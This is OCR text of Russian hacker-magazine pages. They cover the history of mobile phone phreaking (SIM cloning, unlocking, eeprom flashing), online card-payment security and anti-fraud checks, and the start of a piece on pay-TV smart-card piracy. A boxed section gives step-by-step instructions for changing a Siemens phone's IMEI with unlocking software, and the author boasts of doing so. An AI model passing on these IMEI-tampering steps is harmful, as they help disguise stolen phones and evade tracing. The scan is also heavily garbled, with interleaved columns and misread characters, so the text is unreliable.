городом - OKONO четырех километров. 
Как только абонент переходит с вклю- 
ченным телесфоном из одной соты в 
другую, его регистрирует базовая 
станция той соты, на которой он в 
данный момент находится. Расстояние 
go ближайшей базовой станции опре- 
деляется элементарно. Во многих ап- 
паратах эта уникальная опция скрыта, 
ее просто нужно найти. Мобильный 
телефон определяется по-другому: у 
каждого аппарата есть пятнадцатиз- 
начный серийный номер - IMEI. Пер- 
вые четырнадцать цифр этого номера 
фиксировано устанавливаются при 
прошивке, пятнадцатая генерируется 
псевдослучайно. У всех телефонов 
IMEI изначально разный; к определе- 
нию и регистрации в сети он никакого 
отношения не имеет. Он нужен для то- 
го, чтобы узнать владельца аппарата, 
если это необходимо. Но это намного 
более трудоемкое и неблагодарное 
занятие, чем определение местополо- 
жения активной в данный момент SIM- 
карты. Серийный номер мобильного 
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Unlocker gna Mitsubishi 


Unlocker gna Sony J5/Z5 


телефона говорит о многом. По нему 
можно узнать номер партии, к кото- 
рой принадлежит данный телефон. A 
по номеру партии - "серый" этот сото- 
вый или нет. 


SIMEDIT И В$-232 

m Много ходило и ходит легенд о пе- 
репрошивке $!М-карты. Некоторые из 
этих легенд никакого отношения к са- 
мой перепрошивке не имеют. Переп- 
рошивка, или клонирование, SIM-Kap- 
ты, на самом деле нетрудоемкий про- 
цесс, но он требует больших матери- 
альных затрат, прямых рук, светлой 
головы и большого количества сво- 
бодного времени. Очень часто я слы- 
шал рассказы о том, что люди созда- 
вали образ симки, имея в руках толь- 
ко комплекты PIN и PUK-KOgoB от этой 
самой $!М-карты, а потом с помощью 
кабеля RS-232 запросто перепроши- 
вали ее в самом телефоне. Это бред. 
На данный момент я не знаю челове- 
ка, который смог бы перепрошить 
$ М-карту удаленно, и, наверное, не 
узнаю никогда. Также упоминалась 
программа SIMEdit, которая может 
"абсолютно" все, на поверку оказав- 
шаяся обычным редактором TenecpoH- 
ной книги, деревянным и не бесплат- 
ным. Узнать тот самый 128-битовый 
ключ $!М-карты можно только с по- 
мощью мощнейшего криптоанализа- 
тора (стоимость которого заоблачна 
для среднестатистического пользова- 
теля), и не меньше чем за 10 часов. 


лать звонки, а не принимать их. В то 
время минута, по теперешним меркам, 
стоила очень дорого, и этот бизнес то- 
ГО СТОИЛ. 


Ш Узнать свой IMEI можно, набрав на телефоне в режиме 
ожидания *#06$. 


В мае 2002 года в российских СМИ 


и IMEI Programmer for EMMI box появилось заявление о том, что спе- 
циалисты из компании IBM смогли 
. взломать код 5!М-карты с помощью 
Comport: COM? Read : | 


только общедоступных электронных 
приборов за несколько минут. Т.е. 
любой дядя Вася, о котором я упо- 
минал ранее, может с помощью OG- 
ного паяльника за пять минут взла- 
мывать симки. Естественно, такой 
расклад не понравился никому. Сра- 
зу же после этого феноменального 
открытия (не факт, кстати, что оно 
было открытием - у нас тоже не ду- 
раки сидели), по технологии, предпо- 
женной IBM, к кодовой матрице бы- 
ла добавлена вспомогательная, бес- 
порядочно сгенерированная, кото- 
рая усиливала защиту $!М-карты на 
порядок и прикрывала обнаружен- 
ную дырку. К этому времени офрике- 
рство постепенно изжило себя. 


31 337313376660 


Есть еще OGHO "но": за эти десять, а 
может, и больше часов идет сильней- 
шая нагрузка Ha SIM, и некоторые эк- 
земпляры карточек этого не выдержи- 
вают и сгорают. 


товарища, которая обязана выжить, 
потому что ей еще предстоит рабо- 
тать. Но фрикеров такие нюансы не 
останавливали, а даже наоборот - 
вдохновляли. Они находили симки, 
делали их образы и выкидывали сот- 
ни сгоревших. Телесфонных хакеров 
не останавливало даже то, что с пе- 
репрошитой карты можно только де- 


ЖАРКАЯ ВЕСНА СОРОК ПЯТОГО 
m Иными словами, при себе, мини- 


MYM на полдня, нужно иметь $!М-карту ЕВ 


Специалисты из компании IBM смогли 
взломать код $М-карты с помощью 
только общедоступных электронных 

приборов за несколько минут 


BONUS ROUND 


Ш Я думаю, тебе не терпится что-нибудь сделать со своим телефо- 
ном, а разбираться с flash'om вручную неохота. По глазам вижу и 
понимаю. Наверное, тебе уже хочется поменять несколько чисел 
серийного номера телефона на год своего рождения. Сегодня я 
предоставлю тебе эту уникальную возможность. Раз уж мы в 
статье упоминали про Siemens, то с ним и будем работать. Приго- 
товься стать настоящим фрикером. 


Ш Приготовился? Поехали. Для того чтобы изменить IMEI своего 


телефона, нужно: ыы 
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1. Включить компьютер. 
2. Иметь в руках сотовый теле- 


Te 
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фон и кабель RS-232, подклю- 
ченный к компьютеру. 

3. Установить с диска, прила- 
гающегося к журналу, прог- et er 
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pammy Siemens Unlock. 

4. Запустить программу и выб- 
рать модель своего сотового. 
5. Зайти Сервис > Разблокиро- 
вать/Сменить IMEI. 

6. Ввести желаемый IMEI и нажать кнопку сменить. 


Ш Как ты уже заметил, функции программы на этом не ограничива- 
ются. Надеюсь, намек понят :). И напоследок: если тебе это все 
очень интересно, зайди на ftp://vts.viad.ru/pub/. Ты обязательно 
найдешь там что-нибудь для своего телефона. 


С телефонами же стандарта ВАМР5, 
AMPS и пр. дела обстояли намного 
проще. Информация о сим-карте хра- 
нится у них в энергонезависимой па- 
мяти телесфона - eeprom'e. Чтобы cge- 
лать "двойник" такого телефона, нуж- 
но всего лишь изменить IMEI, кото- 
рый, кстати, никак не зашисфрован. 


NO PAIN, NO GAME 

и Хакеров ловили и сажали. Их бы- 
ло немного, и поймать их было нет- 
рудно. Им подсылали подставных лиц 
под видом покупателей, а потом бра- 
ли с поличным. Намного больше было 
людей, которые пользовались левы- 
ми $1М-картами, и посадить их было 
сложнее. Им нечего было предъявить. 
А Управлению "Р" надо было повы- 
шать раскрываемость телефонных 
преступлений, потому что заявлений 
приходила уйма. Операторы сами пы- 
тались бороться с хакерами. Множест- 
во людей обращались в центральные 
офисы с вопросом: "А откуда у меня в 
распечатках счетов такие огромные 
суммы и непонятные телефонные но- 
мера?" Абоненту вдвойне компенси- 
ровали украденную сумму, просили 
вычеркнуть свои телефоны и начина- 
ли работать с оставшимися. По этим 
номерам пытались выйти на "двойни- 
ков", но результатов, естественно, эти 
оперативно-розыскные мероприятия 
не давали. Так было в самом начале, 
сейчас же такие проблемы могут воз- 
никнуть из-за неточности систем бил- 
линга. Но до сих пор для меня остает- 
ся загадкой, почему операторам это 
всегда идет в плюс :). 


ПИОНЕР ВСЕГДА ГОТОВ, КАК 
ГАГАРИН И ТИТОВ 

и Но шло время, поднимать деньги с 
пола стало намного сложнее, особенно 


сидя. Нужно было искать более закон- у 


мя, подни- 
мать деньги с 
пола стало 
намного 
сложнее, осо- 
бенно сидя. 
Нужно было 
искать более 
законные ме- 
тоды. Закон- 
ные в том 
смысле, что- 
бы в уголов- 
ном кодексе 
не было по 


этому поводу 
законов. 


Телефонный 
flash - это 
практически 
то же, что и 
операционная 
система 


компьютера. 
Это все теле- 
фонное ме- 
ню, игры, 
калькулятор, 
диктофон и 
пр. Эта па- 
мять - как 
матрешка, 
которая про- 
дается на 
Старом Арба- 
те. 
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Смена IMEI в Samsung'e 


ные методы. Законные в том смысле, 
чтобы в Уголовном кодексе не было по 
этому поводу законов. На рынок связи 
пришла новая волна фрикеров, кото- 
рых фрикерами-то не назовешь. ИХ ста- 
ло очень много. Они просто умели тупо 
производить разлочку сотовых теле- 
фонов и последующую их русиорика- 
цию, нажимая клавиши на клавиатуре в 
определенном порядке. У них не было 
никакого багажа знаний, о том, как это 
делать, им рассказали умные люои, ко- 
торые, в большинстве своем, шлифро- 
вали к тому времени нары. 


Чуть раньше разлочить телефон сто- 
ило дорого: в розницу порядка 40-50 
американских президентов. Аппараты 
стоили в России намного дороже, чем 
на Западе. Их оттуда и везли. Здесь 
телефоны перепрошивали под наши 
сети. Именно в то время появилось 
понятие "серый" телефон. Сейчас 
"серых" практически нет, правда, 
иногда в Москве можно увидеть 
крупные партии. Но не тогдашнего 
масштаба, когда только в офисах 
операторов продавали сертифициро- 
ванное оборудование. Тут пришло и 
много зеленых сфрикеров, и цены ста- 
ли обвально падать: буквально go 
двух-трех долларов за штуку. Каж- 
дый хотел урвать свой кусок, и нере- 
зиновый пирог пришлось поделить 
на огромное количество человек. Тог- 
да для тех, кто был не в курсе (а их 
было подавляющее большинство), 
разлочка телефона стояла на одном 
уровне сложности с перепрошивкой 
$М-карты. Они были практически 
правы, но этот уровень для них был 
самым последним. Когда гражданин 
узнавал, что "тот вон парень в рыжей 
футболке перепрошивает телефо- 
ны", он сразу проникался глубоким 
уважением к этому человеку. 


СЕРИЙНЫЕ НОМЕРА 

ш Используя информацию о мо- 
бильниках, которая на данный мо- 
мент лежит в интернете, можно прак- 
тически с любым телефоном вытво- 
рять что угодно. Можно заблокиро- 
вать сотовый на сеть, на отдельную 
$М-карту, снять с телефона код бло- 
кировки, изменить IMEI и много чего 
другого. Кстати, про IMEI. Однажды с 
моей знакомой приключилась непри- 
ятная история. В институте у нее ук- 
рали телесфон, и она обратилась в 
офис оператора с вопросом о воз- 
можности возврата ей ее сотового. 


IMEI телефона 


Оператор сказал, что это не вопрос. 
Он объяснил, что нужно только по- 
дать заявление в милицию, и он (опе- 
ратор) сам по серийному номеру те- 
лесфона найдет аппарат, ведь каждый 
номер уникален. Они ей совершенно 
серьезно сказали, что IMEI изменить 
невозможно, когда я буквально за 
несколько часов до этого менял пер- 
вые одиннадцать цифр серийного но- 
мера мобильного на номер своего со- 
тового телефона в международном 
сфрормате. Именно поэтому в самом 
начале я сказал, что IMEI разный у 
всех телефонов только изначально, 
на этапе их выпуска с конвейера. 


Потом можно найти телесрон с таким 
же серийным номером, как у твоего, 
причем не один. Возникает предполо- 
жение, что операторы сотовой связи 
просто делают вид, что они не в курсе. 


FLASH, EEPROM И ДРУГИЕ 
СТРАШНЫЕ СЛОВА 

и Как я уже говорил, разлочить те- 
лефон просто, так же просто, как и 


достать для этого программное обес- 
печение. Чтобы заставить сотовый 
работать в необходимом качестве, 
нужно изменить его память, т.е. пе- 
репрошить ее. Я говорю про flash-na- 
мять телефона. Только не про TOT 
flash, который ты засовываешь в 
цисфровой сфотоаппарат или mp3-nne- 
ep, и не про тот, который ты наблюда- 
ешь в интернете. Телефонный flash - 
это практически то же, что и операци- 
онная система компьютера. Это все 
телефонное меню, игры, калькулятор, 
диктофон и пр. Эта память - как мат- 
решка, которая продается на Старом 
Арбате. Самая большая - flash, в Hee 
входит eeprom, который значительно 
меньше. В eeprom'e записана вся ин- 
формация по кодам блокировки теле- 
срона, настройкам аппарата и другим 
нужным штуковинам. И самая nocneg- 
HAA - память, содержащая IMEI и дату 
выпуска телефона - она, в свою оче- 
редь, является частью еергот'а. Для 
русификации телефона производятся 
изменения во всем flash'e, для раз- 
лочки телефона или смены серийного 


номера - в еергопт'е. Flash в среднем 
весит 14 мегабайт, eeprom - 53 кило- 
байта, поэтому для разлочки телефо- 
на легче из аппарата выкачивать 
именно eeprom, и с ним уже работать 
дальше. Единственный нюанс - про- 
верка контрольной суммы. Если во 
flash'e стереть что-то нужное или go- 
бавить лишнее, телефон в лучшем 
случае откажется работать. 


УНИВЕРСАЛЬНАЯ ПРОГРАММА 
m Нужно было найти сост, который 
бы выкачивал flash из TenecpoHa, а по- 

том закачивал его обратно. Раньше 
эти программы были страшным секре- 
том, многие даже не знали, как они 
называются, некоторые делали их са- 
мостоятельно, но от этого суть не ме- 
нялась. Сейчас я расскажу про прог- 
рамму для работы с телефонами мар- 
ки Siemens. Ребятам-разработчикам 
этой программы поставили памятник 
при жизни. Эта штуковина называет- 
ся Unisiemens, достать ее можно в лпю- 
бом месте Интернета, и она проста в 
применении. С ее помощью можно 
скачать и flash, и eeprom, и даже ку- 
cok flash'a с определенного адреса, а 
потом залить это все обратно. 


Есть два способа разлочить телефон. 
Самый простой способ: скачать из та- 
кого же, но не незалоченного, телефро- 
на еергот и залить его на залоченный. 
Самый сложный способ: слить eeprom 
из залоченного телесрона - он будет 
представлять собой обычный бинар- 
ник, и разбираться с ним в шестнадца- 
тиричном редакторе. Я в свое время 
выбрал HexEditor - он go сих пор лежит 
у меня на почетном месте. Выбор за то- 
бой. Практически так же меняется 1МЕ! 
телефона, правда для этого существу- 
ют немного другие программы, но в ин- 
тернете их тоже достать несложно, а 
пользоваться еще легче. 


У меня самый первый разлоченный 
телесрон был мой собственный. Я его 
заблокировал, а потом перепрошил. Я 
очень за него боялся - он стоил боль- 
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Та самая программа - Unisiemens 


ше трехсот баксов, а другой я поку- 
пать не хотел. Но все прошло нор- 
мально. И после этого я уже не боял- 
ся ничего :). 


И СНИТСЯ НАМ НЕ 
POKOT КОСМОДРОМА... 

m Но фрикеры занимались не толь- 
ко разлочкой аппаратов и дублирова- 
нием $!М-карт. В то время существо- 
вали возможности прослушивания 
разговоров по мобильным телефро- 
нам. Оборудование стоило порядка 
пятидесяти-ста тысяч долларов. 
Главное, чтобы были заказы, правда, 
за абонентами нужно было бегать в 
пределах одной соты. Шифровка тог- 
дашнего GSM'a, которой, к слову ска- 
зать, почти и не было, на несколько 
порядков была слабее шифровки 
GSM'a сегодняшнего. Раньше onepa- 
торы не задумывались о возможнос- 
ти таких случаев, пока не посадили 
пару "шпионов". Теперь же сотовая 
связь практически безопасна: даже 
операторы сами не могут слушать 
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абонентов. Но бывает, что операторы 
снимают шифрование с сети. Навер- 
ное, все помнят недавний теракт в 
Тушино во время праздника Крылья. 
В тот день на территории аэродрома, 
где проходил праздник, go вечера 
были отключены все базовые стан- 
ции. Иными словами, образовался ин- 
формационный колпак, блокирую- 
щий услуги всех московских операто- 
ров сотовой связи. Буквально в сле- 
дующие дни по всей Москве по при- 
казу правительства была отключена 
шифровка разговоров на всех COTO- 
вых телефонах стандарта GSM. Тогда 
абоненты на три дня смогли почув- 
ствовать себя в девяносто третьем. 


А СЕЙЧАС... 

m Сейчас, в силу причин, о которых 
я рассказал выше, телефонный 
фрик стал историей. Сегодня совсем 
другая, на несколько порядков силь- 
нее, защита сотовых сетей и SIM- 
карт, другое время, другие понятия. 
Те фрикеры знали, что только на 
первом этапе появления сотовой 
связи в России можно зарабатывать 
большие деньги. Они знали, что та- 
кие времена быстро пройдут. И те, 
кто был хитрее, отхватили больше 
всех и ни о чем потом не жалели. По 
крайней мере, на хлеб с икрой им 
хватало вполне. 


Теперь прошли времена телефонов 
размером с двухкассетный видео- 
магнитосфон, а цена минуты разгово- 
ра с пяти американских долларов 
скатилась до SMS за один америка- 
нский цент. Уже давно никто не пе- 
репрошивает 5!М-карты, зато Ha Ми- 
тино непонятно откуда берутся но- 
мера карточек предоплаты, написан- 
ные в столбиках на листах бумаги. 
Но это уже информационный сфрик, 
который прочно занимает место теле- 


онного. 


Сегодня сов- 
сем другая, 
на несколько 


порядков 
сильнее, за- 
щита сото- 
вых сетей и 
$1М-карт, 
другое вре- 
мя, другие 
понятия. 
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Денис Овсянников (den@ovideo.ru) 


T отальное заполнение виртуального пространства огромным количеством товара не оставляет нам иного выбора, 


кроме как делать покупки за виртуальные деньги, имеющие хождение только в интернете. 


Ч 
севозможные карточ- нии покупки ты сообщаешь магази- Чтобы осуществлять процессинг 
ные системы VISA, ну, кроме пин-кода, следующую ин- AMEX, банку нужно заключить goro- 
Mastercard и другие, формацию: ФИО, паспортные дан- вор непосредственно с АМЕХ, а это 
используемые в оф- ные и срок действия карты. Причем порождает множество проблем, в от- 
лайне, также претенду- то, что ты сообщаешь, с первого ра- личие от ситуации с VISA. Поэтому в 
ют на роль электронных денег. OGHa- за принимается интернет-магазином России эти карты практически нигде 
ко изначально перед ними была пос- без подтверждения, как истинная ин- не принимают к оплате. Основная 
тавлена совершенно другая задача, формация. У мошенников соблазн часть оборота приходится на 
отсюда и проблемы с защитой плате- стащить пару штук возникает имен- VISA/Mastercad. По исследованиям, 
жей. А, как известно, где деньги - там но здесь, из-за кажущейся незащи- проведенным службой Assist, распре- 
и мошенники ;). щенности системы. деление между VISA и МС составляет 
60% на 40%. А на долю электронных 
Сегодня в России обслуживается бо- В Сети были и есть сайты, которые систем WebMoney и других приходит- 
лее 15000000 пластиковых карт. Каж- под разными предлогами просят по- ся не более 10% от оборота. 
gaa карта имеет своеобразную защи- сетителей ввести именно эту инорор- 
ту обновлением - сроком действия, со- — мацию, откуда она прямым потоком ПРОФИЛАКТИКА 
держит персональный номер, имя и перетекает в базы данных ворован- НЕ ПОМЕШАЕТ 
фамилию владельца. Самая простая ных номеров кредитных карт. Некото- m Быть начеку и постоянно (хотя бы 
покупка в интернете требует ввода рые умудряются согласно этим дан- раз в месяц) проводить мониторинг 
Henocpeg- этих незамысловатых данных. Удоб- ным смастерить "белый пластик" операций по твоей карте не только 
ственно во- ный "магазин на диване" доставляет (клон оригинальной пластиковой кар- полезно, но и необходимо. В случае 
а нам товар, а второй волной еще и мо- ты). Ворованные карточки продаются обнаружения "ошибки" и твоем несог- 
"злые" ха- шенников. Ущерб от их деятельности оптом от1 бакса за штуку (по 100 ласии с операцией, прошедшей по 
черные. в России около 3 миллионов долла- штук и более). карте, необходимо срочно звонить в 
шляпы" ров в год (в мире около 1,5 миллиар- банк (не позднее 30 дней со дня вы- 
О дов долларов в год). Конечно, это Более сложная система идентисрика- писки операции) и блокировать карту. 
ОСТы приблизительные данные, так как о ции (опознавания) применяется в кар- — Далее пытаешься получить компен- 
и вреди- реальных результатах мы узнать ни- тах American Express. По уровню за- сацию. Платежные системы не несут 
ее когда не сможем - банки ценят свою щиты при проведении интернет-пла- ответственности перед своими клиен- 


На террито- 
рии России 
только 
юридичес- 
кое лицо 
может при- 
нимать пла- 
тежи по 
пластико- 
вым картам, 
это пропи- 
сано в зако- 
не. 


репутацию. Однако, по данным иссле- 
довательской сфирмы Celent 
Communications, ежегодный оборот в 
900 миллиардов долларов США og- 
ной только VISA делает процент краж 
незначительным (при этом кражи при- 
водили к банкротству даже некото- 
рые средние фирмы). 


ЗАЩИТА ПЛАСТИКОВЫХ КАРТ 
m Стандартные пластиковые карты 
имеют магнитную полосу, голограм- 
мы, пин-код, уникальный номер и 
срок действия. Обычно при соверше- 
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тежей эта система сравнима с систе- 
мой, применяемой в VISA/Mastercard. 


тами за потери, связанные с карточ- 
ным мошенничеством, но банк обязан 


Сегодня в России обслуживается 
более 15000000 
пластиковых карт 


Ш По оценкам экспертов Альфа-банка, объем рынка интернет- 
торговли в России в 2003 году составляет 150-200 миллионов 
долларов (0,2% от общего оборота розничной торговли в 

стране). Для сравнения, в США оборот электронной коммерции 


в 2002 году составил 42 миллиарда долларов (примерно 1,5% 


от всего оборота). 


Ш По оценкам различных экспертов, в России сейчас 
насчитывается порядка 700 хороших интернет-магазинов. 
Процент возврата по платежам в среднем составляет 2%. 


предпринять все возможное, чтобы 
твои деньги были в целости и сохран- 
ности. Правда, тебе нужно еще дока- 
зать, что это не ты совершал спорную 
операцию :). 


Банки же, в свою очередь, тоже 
страхуются - "Страхование рисков 
банка как эмитента пластиковых 
карт". Парадоксально, но владелец 
интернет-магазина, в случае обна- 
ружения банком "левой транзак- 
ции", также вынужден нести поте- 
ри. С него обычно списывают сумму 
транзакции и налагают штраф по- 
рядка 50 зеленых. Как обезопасить 
свое существование, никто пока go 
конца не решил, всегда есть обход- 
ные пути. 


ТОРГОВЫЕ ПЛОЩАДКИ 

В России существуют две крупные 
торговые площадки (Assist.ru и Cyber- 
plat.ru), которые предоставляют широ- 
кий сервис для интернет-магазинов и 
сервис приема и обработки платежей 
для всех покупателей, использующих 
кредитные карты. Поддерживаются 
наиболее распространенные пласти- 


ковые карты следующих платежных 
систем: VISA, EuroCard/MasterCard, 
Diners Club, JCB и STB. Кроме этого, 
Assist предлагает прием чисто элект- 
ронных систем наличности: 
WebMoney, Яндекс.Деньги, Кара, e- 
port и Kredit Pilot. 


Механизм реализации платежей что в 
Assist, что в Cyberplat практически 
одинаковый. Интернет-магазины че- 
рез автоматизированный сервис оп- 
ределяют страну-эмитент кредитки по 
номеру карты, а для зарегистрирован- 
ных в А$$15{ магазинов также предос- 
тавляется информация по банку-эми- 
тенту кредитки и курсам валют. 


СУВЕВСНЕСК 

В Cyberplat используется 
собственная система для обслужива- 
ния транзакций клиентов-покупате- 
лей - CyberCheck. Эта система "обес- 
печивает конфиденциальность, на- 
дежность и юридическую чистоту вза- 
имодействия сторон, а также полное 
отсутствие отказов от заявленных 
платежей. Это реализуется механиз- 
мами поддержки электронного доку- 


SET (SECURE ELECTRONIC TRANSACTION) 
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ментооборота с применением имею- 
щего юридическую силу аналога 
собственноручной подписи с длиной 
ключа 512 бит". 
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ОПЛАТА ЧЕРЕЗ CYBERPLAT 
- Покупатель формирует заказ и на- 
жимает кнопку "Оплатить". Запрос с 
необходимыми параметрами отправ- 
ляется в интернет-магазин. 
- Магазин формирует электронный 
счет на основании электронного пла- 
тежного документа, подписанного 
аналогом собственноручной подписи 
(АСП). 
- Покупатель подтверждает и отправ- о 
сновная 
ляет в магазин соответствующее проблема, 
подтверждение правильности зака- требующая 
за, счетов и необходимых сопутству- Pete 
о при прове- 
ющих деталей заказа. дении 
- Интернет-магазин сформирует зап- электрон- 
ыы ных плате- 
рос на авторизационный сервер CF Oo Sn 
CyberCheck. вопрос бе- 
зопасности. 


- Следует запрос от сервера в банк 
покупателя (где была выпущена кре- 
дитная карта). 

- Проверяется истинность введенной 
информации и полученный резуль- 
тат отправляется на сервер 
CyberCheck. 

- Результат авторизации поступает 
одновременно к интернет-магазину и 
покупателю. 

- В случае успешной авторизации 
происходит перевод средств в банк 
магазина. 

- После перевода генерируется подт- 
верждение об успешном переводе 
требуемой суммы. 


Как только 
этот барьер 
будет взят - 
электронная 
коммерция 
начнет 
стремитель- 
но расти. 
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Стандарт- 
ные пласти- 
ковые кар- 
ты имеют 
магнитную 
полосу, го- 
лограммы, 
пин-код, 
уникальный 
номер и 
срок 
действия 
карты. 
Обычно при 
совершении 
покупки ты 
сообщаешь 
магазину, 
кроме пин- 
кода, следу- 
ющую ин- 
формацию: 
ФИО, пас- 
портные 
данные и 
срок 
действия 
карты. 


Быть наче- 
Ky и посто- 
янно (хотя 
бы раз в 
месяц) про- 
водить мо- 
ниторинг 
операций по 
своей карте 
не только 
полезно, но 
и необходи- 
мо. 


- Интернет-магазин совершает опера- 
цию продажи/доставки товара или ус- 
луги. 


ОПЛАТА ЧЕРЕЗ ASSIST 

Среди новых технологий, применя- 
емых в России аля обеспечения бо- 
лее безопасного перевода платежей, 
далеко пошла компания Assist. Упро- 
щенно механизм реализации приема 
платежей в Assist следующий: 


- Покупатель заходит на сайт магази- 
на, подключенного к системе Assist, 
выбирает товар и тип оплаты (кребдит- 
ными карточками). 

- Магазин формирует заказ и переад- 
ресовывает покупателя на авториза- 
ционный сервер Assist, одновременно 
на сервер передаются код магазина, 
номер заказа и его сумма. 

- Во время авторизации сервер уста- 
навливает с покупателем соединение 


| Отношение поисковика к взлому 
кредитки 


по защищенному протоколу SSL и по- 
Лучает от покупателя параметры кре- 
дитной карточки. При этом магазин 
этой информации не видит. 

- Авторизационный сервер обрабаты- 
вает полученную информацию и пе- 
редает ее в расчетный банк системы. 
- Банк проверяет наличие магазина в 
системе, проверяет соответствие опе- 
рации системным ограничениям. В ре- 
зультате платеж разрешается или 
запрещается. 

- При запрете банк передает автори- 
зационному серверу Assist отказ, сер- 
вер передает отказ покупателю (с 
объяснение причины) и магазину (с 
номером заказа). 


- При разрешении авторизации зап- 
рос передается через закрытые бан- 
ковские сети банку-эмитенту карты 
покупателя. 

- При положительном результате ав- 
торизации банк передает "добро" ав- 
торизационному серверу, а сервер, в 
свою очередь, передает "добро" поку- 
пателю и магазину (с номером зака- 
за). Далее банк перечисляет средства 
на счет магазина, а магазин отпускает 
товар. 


ОПЛАТА ЧЕРЕЗ 
ASSIST 3D-SECURE 

В случае платежа по 3D-Secure 
магазин не несет ответственности за 
мошенническое использование плас- 
тиковой карты, потому что решение о 


том, является ли данная операция по 
пластиковой карте санкционирован- 
ной, принимает банк-эмитент. Схема 
платежа при использовании 3D- 
Secure выглядит так: 


- Покупатель выбирает товар. 

- После формирования заказа поку- 
патель футболится на авторизацион- 
ный сервер Assist, где вводит пара- 
метры своей кредитной карты. 

- Сервер проверяет, участвует ли дан- 
ная карта в платежах по протоколу 
3D-Secure. Если да, то покупатель ne- 
ренаправляется на сайт банка-эмитен- 
та. Если нет, то платеж проходит по 
технологии SET. 

- На сайте банка-эмитента проводится 
аутентификации (сам банк определя- 


Приходится выбирать золотую 
середину, отсюда 
несовершенство защиты 


нае” 


peut ны т 


Г Wheater 


ет, как он это будет делать). В случае 
успешной аутентификации банк-эми- 
тент возвращает платежной системе 
подписанное цифровой подписью со- 
общение, что банк-эмитент верит по- 
купателю и не возражает против со- 
вершаемой операции. Далее как 
обычно. 


ЗАЩИТА 

Особое внимание уделяется за- 
щите от всевозможного мошенниче- 
ства. Меры по защите поясню на при- 
мере Assist. 


- Защита по номеру карты. Магазин 
ведет свой "черный список" номеров 
карт, которым автоматически отказы- 
вается в обслуживании. Можно ис- 
пользовать список, который ведет са- 
ма система, или списки других магази- 
нов. Магазин сам выбирает степень 
защиты, которая ему необходима. 
- Защита по ящику электронной поч- 
ты. Используется, если есть необхо- 
димость запретить авторизацию 
пользователю с определенным е-тай 
или по маске (например, все от 

Х 
- Защита по |Р-адресу плательщика. У 
магазина есть возможность составить 
список |Р-адресов или масок, с которых 
запрещена авторизация. Однако в слу- 
чае с dialup защита no IP-agpecy He сра- 
батывает. 
- Защита по частоте авторизаций. Вклю- 
чается механизм эвристического анали- 
за параметров авторизации, отсекаю- 
щий подозрительные запросы. Повто- 
рение авторизации возможно лишь че- 
рез некоторое время. Честному покупа- 
телю придется немного подождать, зато 
эфорективность работы взломщика бу- 
дет значительно снижена. 
- Защита от анонимных прокси-серве- 
ров. Анонимные прокси-серверы поз- 
воляют скрыть [Р-адрес, этим зачастую 
пользуются мошенники. Система пос- 
тоянно обновляет список таких серве- 
ров и блокирует подобные заказы. 
- Максимальное количество транзак- 
ций по карте в день. Позволяет огра- 
ничить количество авторизаций по 
карте. Также есть ограничения по мак- 
симальной сумме платежа, по количе- 
ству транзакций или обороту в день. 


- 
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- Защита по CVC2 (работает в случае 
подключения к центру STB). Позволя- 
ет снизить возврат платежей (chagre 
back). 

- Резервная авторизация. Может быть 
включена, если покупатель первый 
раз совершает покупку в данном ма- 
газине (или в других случаях). В этом 
режиме система просит указать ФИО 
покупателя, напечатанное на карте, 
номер паспорта покупателя и его ag- 
рес. Результат выполнения резерв- 
ной авторизации бывает ясен через 
несколько часов. 


Любой магазин выбирает защиту сам, 
исходя из своей клиентуры и ассорти- 
мента. Время для подтверждения про- 
хождения транзакции составляет в 
среднем от 3 до 5 минут. При этом, 
чем надежнее защита, тем меньше 
поток добросовестных покупателей 
из-за задержек. Приходится выбирать 
золотую середину, отсюда несовер- 
шенство защиты. 


ИНТЕРНЕТ-ТОРГОВЛЯ 
В РОССИИ 

По мнению Марины Исаевой, ру- 
ководителя отдела PR и маркетинга 
ООО "Ассист", "прием платежей с по- 
мощью кредитных карт у нас в России 
развит плохо. Дело в том, что подав- 
ляющее большинство карт в России - 
дебетовые, а они не принимаются для 
оплаты через интернет. Однако рынок 
интернет-торговли развивается. Если 
говорить с позиции маркетинга, то 
сервис покупки товаров и услуг нахо- 
дится на первой стадии развития 
(применительно к теории жизненного 
цикла товара), когда услуга вошла на 
рынок и ожидается повышение спро- 
са на нее. И такой скачок уже был в 
прошлом году, когда аудитория интер- 
нет-магазинов возросла на 80%". 


Р.5. Лично мне, как активному интер- 
нет-покупателю, удобно, когда я могу 
спокойно заплатить за что угодно, не 
выходя из Сети. Тем более что цены в 
интернет-магазинах порой существен- 
но ниже, чем в обычных магазинах, 
так как затраты на складирование и 
транспортировку значительно мень- 
ше. Плюс экономия на зарплате пер- 
сонала - многое элементарно автома- 
тизировано. Удобство очевидно. Пос- 
мотрим, что будет дальше. 


SERPVICE.PU 


вся практическая 
психология MOCKBbI 


ежедневное обновление 


Любой ма- 
газин выби- 
рает защи- 
ту сам, ис- 
ходя из сво- 
ей клиенту- 
ры и ассор- 
тимента. 


Прием пла- 
тежей с по- 
мощью кре- 
дитных 
карт в Рос- 
сии развит 
плохо. Дело 
в том, что 
подавляю- 
щее боль- 
LUMHCTBO 
карт в Рос- 
сии - дебе- 
товые, а 
они не при- 
нимаются 
для оплаты 
через ин- 
тернет. 


ТЕОРИЯ 


ВЕЧНЫЙ БОЙ С ПИРАТАМИ ) 


Берд Киви (kiwi@computerra.ru) 


i | 
8 


р 
| 
Е 


ПРОБЛЕМЫ ЗАЩИТЫ СМАРТ-КАРТ КАБЕЛЬНОГО ТВ {thst 


8 ночь с 30 июня на 1 июля 2003 года компания НТВ-Плюс (www.ntvplus.com), фактически единственный в России 
национальный оператор платного спутникового телевидения, завершила переход на новую систему шифрования 
своих каналов = Viaccess PC 2.4 (www.viaccess.fr). 


X 
ля нелегальных телез- 
рителей эта новость 
была печальной. Начи- 
ная с июля просмотр 
закодированного спут- 
никового ТВ на русском языке с по- 
мощью широко распространенных в 
стране пиратских смарт-карт стал не- 
возможен. Как объявила компания, 
и =| 
В ночь с 30 теперь смотреть НТВ-Плюс могут 
июня на 1 только легальные абоненты, облада- 
июля 2003 ющие карточками нового поколения". 
года компа- 
ния НТВ- _ 
ee ; ШИФРОВАНИЕМ ИЛИ СИЛОЙ 
www.ntv- 
plus.com) Смена системы шифрования - 
завершила мероприятие весьма серьезное и 90- 
переход на 
ЕО СнЕ: рогостоящее, требующее обмена 
тему шиф- смарт-карт у всех легальных подпис- 
рования чиков. Только летом 2003 года у 
своих кана- 
лов - НТВ+ их было, ни много ни мало, 
Viaccess PC около 165 тысяч. По сути дела - это 
Gaww.viac= крайняя антипиратская мера, к кото- 
cess.fr). рой время от времени вынуждены 
прибегать все компании платного те- 
левидения. Связано это с тем, что 
рано или поздно умельцы вновь 
